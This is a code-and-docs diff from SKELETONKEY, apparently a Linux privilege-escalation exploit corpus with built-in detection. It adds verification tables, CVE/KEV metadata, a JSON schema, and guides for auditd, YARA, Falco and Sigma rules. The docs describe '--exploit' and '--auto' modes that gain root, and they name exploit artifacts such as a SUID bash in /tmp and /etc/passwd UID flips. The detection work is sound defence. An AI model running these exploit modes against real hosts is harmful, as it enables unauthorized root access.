+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "stackrot",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "6.1.10-060110-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "sudo_samedit",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "4.15.0-213-generic",
+        .host_distro   = "Ubuntu 18.04.6 LTS",
+        .vm_box        = "generic/ubuntu1804",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "sudoedit_editor",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.0-91-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "PRECOND_FAIL",
+        .actual_detect = "PRECOND_FAIL",
+        .status        = "match",
+    },
+};
+
+const size_t verifications_count =
+    sizeof(verifications) / sizeof(verifications[0]);
+
+const struct verification_record *
+verifications_for_module(const char *module, size_t *count_out)
+{
+    if (count_out) *count_out = 0;
+    if (!module) return NULL;
+    const struct verification_record *first = NULL;
+    size_t n = 0;
+    for (size_t i = 0; i < verifications_count; i++) {
+        if (strcmp(verifications[i].module, module) == 0) {
+            if (first == NULL) first = &verifications[i];
+            n++;
+        }
+    }
+    if (count_out) *count_out = n;
+    return first;
+}
+
+bool verifications_module_has_match(const char *module)
+{
+    size_t n = 0;
+    const struct verification_record *r = verifications_for_module(module, &n);
+    for (size_t i = 0; i < n; i++)
+        if (r[i].status && strcmp(r[i].status, "match") == 0)
+            return true;
+    return false;
+}
@@ -0,0 +1,52 @@
+/*
+ * SKELETONKEY — per-module verification records
+ *
+ * "Verified-on" entries — concrete (distro, kernel, date) tuples where
+ * tools/verify-vm/verify.sh has empirically confirmed a module's
+ * detect() verdict against a known-vulnerable target. Each entry is one
+ * row from docs/VERIFICATIONS.jsonl, auto-generated into the C table
+ * by tools/refresh-verifications.py.
+ *
+ * Modules with >=1 record carry an empirical-trust badge ("✓ verified
+ * on Ubuntu 20.04.6 / 5.4.0") in --list / --module-info / --explain
+ * output. Modules with zero records are still tested at the unit level
+ * (synthetic fingerprints), but have not yet been confirmed on a real
+ * vulnerable kernel.
+ *
+ * Append-only by intent: each verify.sh run appends a fresh JSONL line
+ * (timestamped); the refresh script dedupes to (module, vm_box,
+ * kernel, expect_detect) when generating the C table so re-runs of the
+ * same scenario update rather than accumulate.
+ */
+
+#ifndef SKELETONKEY_VERIFICATIONS_H
+#define SKELETONKEY_VERIFICATIONS_H
+
+#include <stdbool.h>
+#include <stddef.h>
+
+struct verification_record {
+    const char *module;          /* module name (matches struct skeletonkey_module.name) */
+    const char *verified_at;     /* "YYYY-MM-DD" (date-only; full timestamp truncated) */
+    const char *host_kernel;     /* uname -r value, e.g. "5.4.0-169-generic" */
+    const char *host_distro;     /* /etc/os-release PRETTY_NAME, e.g. "Ubuntu 20.04.6 LTS" */
+    const char *vm_box;          /* vagrant box name, e.g. "generic/ubuntu2004" */
+    const char *expect_detect;   /* "VULNERABLE" / "OK" / "PRECOND_FAIL" — what targets.yaml said */
+    const char *actual_detect;   /* what skeletonkey --explain returned */
+    const char *status;          /* "match" iff actual == expected; otherwise "MISMATCH" */
+};
+
+extern const struct verification_record verifications[];
+extern const size_t                      verifications_count;
+
+/* Returns the first record (count via *count_out) for the named module,
+ * or NULL if the module has no recorded verifications. The records are
+ * stored contiguously in the table, so once you have the pointer you
+ * can iterate count_out entries forward. */
+const struct verification_record *
+verifications_for_module(const char *module, size_t *count_out);
+
+/* True iff the module has at least one "match" record. */
+bool verifications_module_has_match(const char *module);
+
+#endif /* SKELETONKEY_VERIFICATIONS_H */
@@ -82,7 +82,11 @@ Code that more than one module needs lives in `core/`:

 1. Parse args (`--scan`, `--exploit <name>`, `--mitigate`,
   `--detect-rules`, `--cleanup`, etc.)
-2. Fingerprint the host
+2. **Fingerprint the host** — `core/host.c` is called once at startup
+   to populate `struct skeletonkey_host` (kernel version + arch +
+   distro + capability gates + service presence). The result is
+   handed to every module via `ctx->host`. See "Host fingerprint"
+   below.
 3. For `--scan`: iterate module registry, call each module's
   `detect()`, emit table of results
 4. For `--exploit <name>`: locate module, gate behind `--i-know`,
@@ -90,6 +94,44 @@ Code that more than one module needs lives in `core/`:
 5. For `--detect-rules`: walk module registry, concatenate detection
   files in the requested format

+## Host fingerprint (`core/host.{h,c}`)
+
+A single `struct skeletonkey_host` is populated once at startup and
+exposed to every module via `ctx->host` (a stable pointer for the
+process lifetime). It carries:
+
+- **Identity:** `struct kernel_version kernel` + arch + nodename +
+  distro id/version/pretty (parsed from `/etc/os-release`).
+- **Process state:** euid, real_uid (defeats the userns illusion by
+  reading `/proc/self/uid_map`), egid, username, is_root,
+  is_ssh_session.
+- **Platform family:** is_linux, is_debian_family, is_rpm_family,
+  is_arch_family, is_suse_family.
+- **Capability gates (Linux):** unprivileged_userns_allowed (live
+  fork-probe), apparmor_restrict_userns, unprivileged_bpf_disabled,
+  kpti_enabled, kernel_lockdown_active, selinux_enforcing,
+  yama_ptrace_restricted.
+- **System services:** has_systemd, has_dbus_system.
+
+Modules that want to consult the fingerprint do:
+
+```c
+#include "../../core/host.h"
+/* ... */
+if (ctx->host && !ctx->host->unprivileged_userns_allowed)
+    return SKELETONKEY_PRECOND_FAIL;
+if (ctx->host->kernel.major < 7)
+    return SKELETONKEY_OK;   /* predates the bug */
+```
+
+The migration is opt-in per module — modules that don't `#include`
+host.h continue to do their own probes; modules that do save the
+duplicate work and get a consistent view across the whole scan.
+
+`--auto` and `--scan` (in verbose mode) print a two-line banner of
+the fingerprint via `skeletonkey_host_print_banner()` so operators
+can see at a glance which gates are open.
+
 ## CI matrix

 `.github/workflows/ci.yml` (planned, Phase 4) runs each module's
@@ -0,0 +1,236 @@
+[
+  {
+    "cve": "CVE-2016-5195",
+    "module_dir": "dirty_cow_cve_2016_5195",
+    "cwe": "CWE-362",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2022-03-03"
+  },
+  {
+    "cve": "CVE-2017-7308",
+    "module_dir": "af_packet_cve_2017_7308",
+    "cwe": "CWE-681",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2019-13272",
+    "module_dir": "ptrace_traceme_cve_2019_13272",
+    "cwe": null,
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2021-12-10"
+  },
+  {
+    "cve": "CVE-2020-14386",
+    "module_dir": "af_packet2_cve_2020_14386",
+    "cwe": "CWE-250",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2021-22555",
+    "module_dir": "netfilter_xtcompat_cve_2021_22555",
+    "cwe": "CWE-787",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2025-10-06"
+  },
+  {
+    "cve": "CVE-2021-3156",
+    "module_dir": "sudo_samedit_cve_2021_3156",
+    "cwe": "CWE-193",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2022-04-06"
+  },
+  {
+    "cve": "CVE-2021-33909",
+    "module_dir": "sequoia_cve_2021_33909",
+    "cwe": "CWE-190",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2021-3493",
+    "module_dir": "overlayfs_cve_2021_3493",
+    "cwe": "CWE-270",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2022-10-20"
+  },
+  {
+    "cve": "CVE-2021-4034",
+    "module_dir": "pwnkit_cve_2021_4034",
+    "cwe": "CWE-787",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2022-06-27"
+  },
+  {
+    "cve": "CVE-2022-0185",
+    "module_dir": "fuse_legacy_cve_2022_0185",
+    "cwe": "CWE-190",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2024-08-21"
+  },
+  {
+    "cve": "CVE-2022-0492",
+    "module_dir": "cgroup_release_agent_cve_2022_0492",
+    "cwe": "CWE-287",
+    "attack_technique": "T1611",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2022-0847",
+    "module_dir": "dirty_pipe_cve_2022_0847",
+    "cwe": "CWE-665",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2022-04-25"
+  },
+  {
+    "cve": "CVE-2022-25636",
+    "module_dir": "nft_fwd_dup_cve_2022_25636",
+    "cwe": "CWE-269",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2022-2588",
+    "module_dir": "cls_route4_cve_2022_2588",
+    "cwe": "CWE-416",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-0179",
+    "module_dir": "nft_payload_cve_2023_0179",
+    "cwe": "CWE-190",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-0386",
+    "module_dir": "overlayfs_setuid_cve_2023_0386",
+    "cwe": "CWE-282",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2025-06-17"
+  },
+  {
+    "cve": "CVE-2023-0458",
+    "module_dir": "entrybleed_cve_2023_0458",
+    "cwe": "CWE-476",
+    "attack_technique": "T1082",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-2008",
+    "module_dir": "vmwgfx_cve_2023_2008",
+    "cwe": "CWE-129",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-22809",
+    "module_dir": "sudoedit_editor_cve_2023_22809",
+    "cwe": "CWE-269",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-32233",
+    "module_dir": "nft_set_uaf_cve_2023_32233",
+    "cwe": "CWE-416",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-3269",
+    "module_dir": "stackrot_cve_2023_3269",
+    "cwe": "CWE-416",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-4622",
+    "module_dir": "af_unix_gc_cve_2023_4622",
+    "cwe": "CWE-416",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2024-1086",
+    "module_dir": "nf_tables_cve_2024_1086",
+    "cwe": "CWE-416",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2024-05-30"
+  },
+  {
+    "cve": "CVE-2026-31635",
+    "module_dir": "dirtydecrypt_cve_2026_31635",
+    "cwe": "CWE-130",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2026-41651",
+    "module_dir": "pack2theroot_cve_2026_41651",
+    "cwe": "CWE-367",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2026-46300",
+    "module_dir": "fragnesia_cve_2026_46300",
+    "cwe": null,
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  }
+]
@@ -41,12 +41,23 @@ make it part of your daily ops" guide.
 # Daily/weekly hygiene check
 sudo skeletonkey --scan

+# Investigate a specific finding (one-page operator briefing)
+sudo skeletonkey --explain nf_tables    # whichever module came back VULNERABLE
+# Shows: CVE / CWE / MITRE ATT&CK / CISA KEV status, live detect() trace,
+# OPSEC footprint (what an exploit would leave behind), detection-rule
+# coverage, mitigation. Paste into the triage ticket.
+
 # If anything's VULNERABLE, deploy detections + apply mitigation
 sudo skeletonkey --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-skeletonkey.rules
 sudo augenrules --load
 sudo skeletonkey --mitigate copy_fail   # or whichever module fired
 ```

+The `--explain` output is also useful as a learning artifact: each
+module's `--explain` block is a self-contained CVE briefing with the
+reasoning chain the detect() function walked, so analysts can verify
+SKELETONKEY's verdict against their own understanding of the bug.
+
 ### Small fleet (~10-100 hosts, SSH-reachable)

 Use `tools/skeletonkey-fleet-scan.sh`:
@@ -168,6 +179,70 @@ skeletonkey --detect-rules --format=sigma > /etc/sigma/skeletonkey.yml
 sigmac -t elastic /etc/sigma/skeletonkey.yml
 ```

+### YARA artifact scanning
+
+YARA rules catch the **post-fire** state — page-cache shellcode
+overwrites, malicious `.deb` drops, `/etc/passwd` UID flips. Run them
+as a scheduled scan against sensitive paths:
+
+```bash
+# Ship YARA rules
+sudo skeletonkey --detect-rules --format=yara | sudo tee /etc/yara/skeletonkey.yar
+
+# Scheduled scan via cron — catches the page-cache and /tmp artifacts
+# /etc/cron.d/skeletonkey-yara
+*/15 * * * * root yara -r /etc/yara/skeletonkey.yar \
+                       /etc/passwd /tmp /usr/bin/su /usr/bin/passwd \
+                       2>>/var/log/skeletonkey-yara.log
+```
+
+What each rule catches:
+
+| Rule | Triggers on |
+|---|---|
+| `etc_passwd_uid_flip` | Non-root user line in `/etc/passwd` with a zero-padded UID (`0000+`). Canonical Copy Fail / Dirty Frag / Dirty Pipe / DirtyDecrypt outcome. |
+| `etc_passwd_root_no_password` | `root` line with empty password field — DirtyDecrypt's intermediate corruption step. |
+| `pwnkit_gconv_modules_cache` | Small `gconv-modules` text file with a `module UTF-8// X// /tmp/…` redefinition. |
+| `dirty_pipe_passwd_uid_flip` | Same UID-flip pattern (Dirty Pipe-specific tag). |
+| `dirtydecrypt_payload_overlay` | First 28 bytes of `/usr/bin/su` (or similar) match the embedded 120-byte ET_DYN shellcode the V12 PoC overlays. |
+| `fragnesia_payload_overlay` | Same shape for the 192-byte Fragnesia payload. |
+| `pack2theroot_malicious_deb` | `.deb` ar-archive in `/tmp` with the SUID-bash postinst. |
+| `pack2theroot_suid_bash_drop` | `/tmp/.suid_bash` exists and is a real bash ELF. |
+
+The page-cache overlay rules (`dirtydecrypt_payload_overlay`,
+`fragnesia_payload_overlay`) are particularly high-signal: no
+legitimate ELF starts with those exact 28 bytes, so a hit means the
+exploit landed.
+
+### Falco runtime detection
+
+Falco catches the exploit **as it fires** by hooking syscalls and
+namespace events. Best deploy for K8s / container hosts but works on
+any modern Linux:
+
+```bash
+sudo skeletonkey --detect-rules --format=falco \
+    | sudo tee /etc/falco/rules.d/skeletonkey.yaml
+sudo falco --validate /etc/falco/rules.d/skeletonkey.yaml
+sudo systemctl reload falco   # or restart, depending on distro
+```
+
+What each rule catches:
+
+| Rule | Triggers on |
+|---|---|
+| `Pwnkit-style pkexec invocation` | `pkexec` spawned with empty argv (the bug's hallmark). |
+| `Pwnkit-style GCONV_PATH injection` | Non-root sets `GCONV_PATH=` / `CHARSET=` before spawning a setuid binary. |
+| `AF_ALG authenc keyblob installed by non-root` | `socket(AF_ALG)` by non-root — Copy Fail / GCM variant primitive. |
+| `XFRM NETLINK_XFRM bind from unprivileged userns` | XFRM SA setup from non-root userns — Dirty Frag / Fragnesia primitive. |
+| `/etc/passwd modified by non-root` | Post-fire signal for the whole page-cache-write family. |
+| `Dirty Pipe splice from setuid/sensitive file by non-root` | `splice()` of `/etc/passwd` or `/usr/bin/su` by non-root. |
+| `AF_RXRPC socket created by non-root` | DirtyDecrypt primitive — `socket(AF_RXRPC)` is nearly unheard-of in production. |
+| `rxrpc security key added` | `add_key("rxrpc", …)` by non-root — DirtyDecrypt handshake setup. |
+| `TCP_ULP=espintcp set by non-root` | Fragnesia trigger — flipping a TCP socket to espintcp ULP. |
+| `SUID bash dropped to /tmp` | Pack2TheRoot postinst landing `/tmp/.suid_bash`. |
+| `dpkg invoked by PackageKit on behalf of non-root caller` | Pack2TheRoot chain — `packagekitd → dpkg` installing a /tmp `.pk-*.deb`. |
+
 ## Day-to-day operational shape

 ### What "good" looks like in the SIEM
@@ -245,6 +320,96 @@ sudo rm /etc/sysctl.d/99-dirtyfail-mitigations.conf
 # Reload affected modules / sysctls per your distro
 ```

+## Per-module detection coverage
+
+Across the 4 rule formats:
+
+| Module | CVE | auditd | sigma | yara | falco |
+|---|---|:-:|:-:|:-:|:-:|
+| copy_fail | CVE-2026-31431 | ✓ | ✓ | ✓ | ✓ |
+| copy_fail_gcm | (variant) | ✓ | ✓ | ✓ | ✓ |
+| dirty_frag_esp | CVE-2026-43284 | ✓ | ✓ | ✓ | ✓ |
+| dirty_frag_esp6 | CVE-2026-43284 | ✓ | ✓ | ✓ | ✓ |
+| dirty_frag_rxrpc | CVE-2026-43500 | ✓ | ✓ | ✓ | ✓ |
+| dirty_pipe | CVE-2022-0847 | ✓ | ✓ | ✓ | ✓ |
+| dirtydecrypt | CVE-2026-31635 | ✓ | ✓ | ✓ | ✓ |
+| fragnesia | CVE-2026-46300 | ✓ | ✓ | ✓ | ✓ |
+| pwnkit | CVE-2021-4034 | ✓ | ✓ | ✓ | ✓ |
+| pack2theroot | CVE-2026-41651 | ✓ | ✓ | ✓ | ✓ |
+| Other 21 modules | various | ✓ | partial | — | — |
+
+Full 4-format coverage on the 10 highest-value modules; auditd
+covers everything. YARA / Falco expansion to the remaining 21 modules
+is incremental contributor work (each module's `detect_yara` /
+`detect_falco` field in the module struct just needs a string).
+
+## Correlation across formats
+
+Single-format detections are useful; the high-confidence signal is
+the **correlation across formats** for the same module in a short
+window. Each exploit leaves a recognisable multi-format trail:
+
+| Exploit | falco fires | auditd fires | yara confirms |
+|---|---|---|---|
+| Pwnkit | `pkexec` empty argv | `execve /usr/bin/pkexec` + `GCONV_PATH=` env | gconv-modules cache in /tmp |
+| Dirty Pipe | `splice()` from `/etc/passwd` | splice + write to `/etc/passwd` | UID flip in `/etc/passwd` |
+| Copy Fail | `socket(AF_ALG)` | algif_aead + `ALG_SET_KEY` | UID flip in `/etc/passwd` |
+| Dirty Frag (ESP) | NETLINK_XFRM sendto + TCP_ULP | XFRM_MSG_NEWSA | UID flip in `/etc/passwd` |
+| DirtyDecrypt | `socket(AF_RXRPC)` + `add_key(rxrpc)` | AF_RXRPC + add_key | 120-byte ELF overwrites `/usr/bin/su` |
+| Fragnesia | `TCP_ULP=espintcp` from non-root | XFRM + setsockopt(TCP_ULP) | 192-byte ELF overwrites `/usr/bin/su` |
+| Pack2TheRoot | dpkg invoked by packagekitd with /tmp/.pk-*.deb | new `.deb` in `/tmp` + `chmod 4755` on `/tmp/.suid_bash` | malicious `.deb` + SUID bash both present |
+
+If **three of the four signals** fire for the same module in the same
+window, the exploit landed. **One signal alone** in a noisy
+environment is more likely a tuning FP; **three signals** is incident
+response.
+
+## Worked example: catching DirtyDecrypt end-to-end
+
+A SOC operator gets a Falco page:
+
+```
+CRITICAL  AF_RXRPC socket() by non-root  (user=alice proc=poc pid=44231)
+```
+
+1. **Confirm via auditd** — pull events keyed on the family:
+   ```bash
+   sudo ausearch -k skeletonkey-dirtydecrypt-rxrpc -ts recent
+   ```
+   Expect: `socket(...,33,...)` + subsequent `add_key("rxrpc",...)`.
+
+2. **Confirm via yara** — scan setuid binaries for the page-cache
+   overlay:
+   ```bash
+   yara /etc/yara/skeletonkey.yar /usr/bin/su /usr/bin/passwd
+   ```
+   If `dirtydecrypt_payload_overlay` matches `/usr/bin/su`, **the
+   exploit landed** — the binary's page cache has been overwritten
+   with the 120-byte shellcode.
+
+3. **Recover** — the on-disk binary is intact; only the page cache is
+   corrupted. Drop it:
+   ```bash
+   sudo skeletonkey --cleanup dirtydecrypt   # or: echo 3 > /proc/sys/vm/drop_caches
+   ```
+
+4. **Sigma hunt for lateral / repeat** — query your SIEM with the
+   sigma rule ID `7c1e9a40-skeletonkey-dirtydecrypt` over the last 7
+   days to find any other hosts.
+
+5. **Patch.** DirtyDecrypt's mainline fix is commit `a2567217` in
+   Linux 7.0 — see [`CVES.md`](../CVES.md) for distro backports.
+
+6. **Harden.** `rxrpc` is rarely needed on non-AFS hosts:
+   ```bash
+   echo "blacklist rxrpc" | sudo tee /etc/modprobe.d/blacklist-rxrpc.conf
+   sudo update-initramfs -u
+   ```
+
+The same shape applies to every module: pick the auditd key, the
+yara rule for the artifact, the falco rule for the runtime signal,
+and the sigma rule for the hunt.
+
 ## Common false positives + tuning

 | Rule key | False positive | Fix |
@@ -0,0 +1,139 @@
+# SKELETONKEY JSON output schema
+
+`skeletonkey --scan --json` (and `--auto --json`, planned) emit a
+single JSON object on **stdout**. All human-readable banner lines and
+per-module log chatter go to **stderr** in JSON mode — pipes to SIEMs
+and fleet aggregators get a clean machine-parseable document on
+stdout while operators still see diagnostics on stderr.
+
+This document is the contract for that JSON. SKELETONKEY treats it
+as a stability commitment: new fields may appear in future releases,
+but existing field names and value types do not change without a
+major-version bump.
+
+## Top-level object
+
+```json
+{
+  "version": "0.6.0",
+  "modules": [ /* ... per-module entries ... */ ]
+}
+```
+
+| Field      | Type     | Stability  | Meaning |
+|------------|----------|------------|---------|
+| `version`  | string   | stable     | The SKELETONKEY release that produced this document. Semver-ish (`MAJOR.MINOR.PATCH`). Consumers may use it to correlate with the corpus inventory in [`CVES.md`](../CVES.md). |
+| `modules`  | array    | stable     | One entry per registered module, emitted in the order the dispatcher's `--list` reports them. Length grows monotonically as new modules land. |
+
+## Per-module entry
+
+```json
+{
+  "name":   "dirty_pipe",
+  "cve":    "CVE-2022-0847",
+  "result": "OK"
+}
+```
+
+| Field    | Type   | Stability | Meaning |
+|----------|--------|-----------|---------|
+| `name`   | string | stable    | The module's CLI identifier — what you pass to `--exploit <name>`. Lowercase, ASCII, `_`-delimited. Never changes for a given module across releases. |
+| `cve`    | string | stable    | The CVE identifier (`CVE-YYYY-NNNNN`), or `"VARIANT"` for sibling variants without their own CVE (e.g. `copy_fail_gcm`), or `"-"` for primitives like `entrybleed` that have a CVE-less role. |
+| `result` | string | stable    | One of the `result` enum values below. |
+
+## `result` enum
+
+| Value          | Exit code | Meaning |
+|----------------|-----------|---------|
+| `OK`           | 0         | Module's `detect()` ran successfully. Host is **patched** for this CVE, or the bug class is not applicable here (predates the introduction, wrong arch, etc.). Safe to ignore for this host. |
+| `TEST_ERROR`   | 1         | `detect()` could not decide — the host fingerprint is missing data, the version parser failed, or an internal probe errored. Treat as "no information; check manually." |
+| `VULNERABLE`   | 2         | Host is **vulnerable** to this CVE per the module's detect logic (version-based and/or empirical active probe). `--exploit <name> --i-know` will attempt to land root. |
+| `EXPLOIT_FAIL` | 3         | Only ever returned by `--exploit`, never by `--scan`. Exploit was attempted but did not land root. Diagnostic context goes to stderr. |
+| `PRECOND_FAIL` | 4         | A documented precondition is not met on this host — examples: unprivileged user namespaces disabled, AppArmor restriction on, sudo not installed, AF_RXRPC unavailable. The bug may exist on the kernel but the carrier path here is closed. |
+| `EXPLOIT_OK`   | 5         | Only ever returned by `--exploit` / `--auto`. Root was achieved; for `--auto` mode this is the process exit code that drove the dispatcher into a root shell. |
+
+## Process exit code semantics for `--scan`
+
+The process exit code is the **worst (highest) result code** observed
+across all modules. This lets a SIEM treat the binary's exit code as
+a single-host alert level without re-parsing JSON:
+
+| Exit code | Interpretation                                      |
+|-----------|-----------------------------------------------------|
+| 0         | All modules `OK`. Host is patched for the corpus.   |
+| 1         | At least one module returned `TEST_ERROR`. Investigate. |
+| 2         | At least one module returned `VULNERABLE`. Patch the host. |
+| 4         | At least one module returned `PRECOND_FAIL` (and none worse). Host has reduced attack surface but is not necessarily safe. |
+
+(Process exit codes 3 and 5 are exclusive to the `--exploit` /
+`--auto` modes and never appear in `--scan` output.)
+
+## Example: invoking + parsing
+
+```bash
+# capture pure JSON
+skeletonkey --scan --json --no-color > host-$(hostname).json 2> /dev/null
+
+# any vulnerable modules?
+jq -e '.modules[] | select(.result == "VULNERABLE") | .name' host-*.json
+
+# fleet roll-up — modules vulnerable across the fleet, by frequency
+jq -s 'map(.modules[] | select(.result == "VULNERABLE") | .name)
+       | flatten | group_by(.) | map({mod: .[0], count: length})
+       | sort_by(-.count)' host-*.json
+```
+
+`jq -e` exits non-zero when its selector matches nothing, giving the
+fleet runner a per-host "any-vulnerable" boolean without parsing the
+document.
+
+## Stability promises
+
+**Stable across non-major releases:**
+
+- Field names listed in the tables above (`version`, `modules`, `name`,
+  `cve`, `result`).
+- The `result` enum string set. New result strings cannot appear
+  without a major version bump.
+- The `modules` array containing exactly one entry per registered
+  module.
+- Exit-code semantics for `--scan`.
+
+**May change without notice:**
+
+- The `modules` array length, ordering, and contents (new modules are
+  added regularly; ordering follows registration order which is
+  stable per release but not a contract).
+- Whitespace / formatting of the JSON itself (consumers MUST parse,
+  not regex).
+- Field values for `cve` (a stub variant could gain a real CVE later).
+
+**May be added in future minor versions:**
+
+- New per-module fields (e.g. `family`, `summary`, `safety_rank`,
+  `kernel_range`). Consumers MUST ignore unknown fields.
+- New top-level fields (e.g. `host_fingerprint`, `scan_started_at`,
+  `schema_version`). Consumers MUST ignore unknown fields.
+- A `--scan --active --json` output may grow per-probe verdict
+  metadata under a new `probe` sub-object.
+
+## Recommended consumer pattern
+
+```python
+import json, subprocess, sys
+
+doc = json.loads(subprocess.check_output(
+    ["skeletonkey", "--scan", "--json", "--no-color"],
+    stderr=subprocess.DEVNULL,
+))
+
+assert doc["version"], "missing top-level version"
+for mod in doc["modules"]:
+    assert mod["name"] and mod["cve"] and mod["result"], \
+        f"malformed module entry: {mod!r}"
+    if mod["result"] == "VULNERABLE":
+        print(f"{mod['name']} ({mod['cve']}): VULNERABLE", file=sys.stderr)
+```
+
+Ignore unknown fields. Match `result` against the enum, but treat
+unknown strings as `TEST_ERROR`-equivalent (forward-compat).
@@ -0,0 +1,47 @@
+# CISA KEV Cross-Reference
+
+Which SKELETONKEY modules cover CVEs that CISA has observed exploited
+in the wild per the Known Exploited Vulnerabilities catalog.
+Refreshed via `tools/refresh-cve-metadata.py`.
+
+**10 of 26 modules cover KEV-listed CVEs.**
+
+## In KEV (prioritize patching)
+
+| CVE | Date added to KEV | CWE | Module |
+| --- | --- | --- | --- |
+| CVE-2019-13272 | 2021-12-10 | ? | `ptrace_traceme_cve_2019_13272` |
+| CVE-2016-5195 | 2022-03-03 | CWE-362 | `dirty_cow_cve_2016_5195` |
+| CVE-2021-3156 | 2022-04-06 | CWE-193 | `sudo_samedit_cve_2021_3156` |
+| CVE-2022-0847 | 2022-04-25 | CWE-665 | `dirty_pipe_cve_2022_0847` |
+| CVE-2021-4034 | 2022-06-27 | CWE-787 | `pwnkit_cve_2021_4034` |
+| CVE-2021-3493 | 2022-10-20 | CWE-270 | `overlayfs_cve_2021_3493` |
+| CVE-2024-1086 | 2024-05-30 | CWE-416 | `nf_tables_cve_2024_1086` |
+| CVE-2022-0185 | 2024-08-21 | CWE-190 | `fuse_legacy_cve_2022_0185` |
+| CVE-2023-0386 | 2025-06-17 | CWE-282 | `overlayfs_setuid_cve_2023_0386` |
+| CVE-2021-22555 | 2025-10-06 | CWE-787 | `netfilter_xtcompat_cve_2021_22555` |
+
+## Not in KEV
+
+Not observed exploited per CISA — but several have public PoC code
+and are technically reachable. "Not in KEV" is not the same as
+"safe to ignore".
+
+| CVE | CWE | Module |
+| --- | --- | --- |
+| CVE-2017-7308 | CWE-681 | `af_packet_cve_2017_7308` |
+| CVE-2020-14386 | CWE-250 | `af_packet2_cve_2020_14386` |
+| CVE-2021-33909 | CWE-190 | `sequoia_cve_2021_33909` |
+| CVE-2022-0492 | CWE-287 | `cgroup_release_agent_cve_2022_0492` |
+| CVE-2022-25636 | CWE-269 | `nft_fwd_dup_cve_2022_25636` |
+| CVE-2022-2588 | CWE-416 | `cls_route4_cve_2022_2588` |
+| CVE-2023-0179 | CWE-190 | `nft_payload_cve_2023_0179` |
+| CVE-2023-0458 | CWE-476 | `entrybleed_cve_2023_0458` |
+| CVE-2023-2008 | CWE-129 | `vmwgfx_cve_2023_2008` |
+| CVE-2023-22809 | CWE-269 | `sudoedit_editor_cve_2023_22809` |
+| CVE-2023-32233 | CWE-416 | `nft_set_uaf_cve_2023_32233` |
+| CVE-2023-3269 | CWE-416 | `stackrot_cve_2023_3269` |
+| CVE-2023-4622 | CWE-416 | `af_unix_gc_cve_2023_4622` |
+| CVE-2026-31635 | CWE-130 | `dirtydecrypt_cve_2026_31635` |
+| CVE-2026-41651 | CWE-367 | `pack2theroot_cve_2026_41651` |
+| CVE-2026-46300 | ? | `fragnesia_cve_2026_46300` |
@@ -0,0 +1,102 @@
+# SKELETONKEY — launch post
+
+> Copy-pasteable for HN, lobste.rs, mastodon, blog. ~600 words.
+
+---
+
+## SKELETONKEY: a curated Linux LPE corpus with detection rules baked in
+
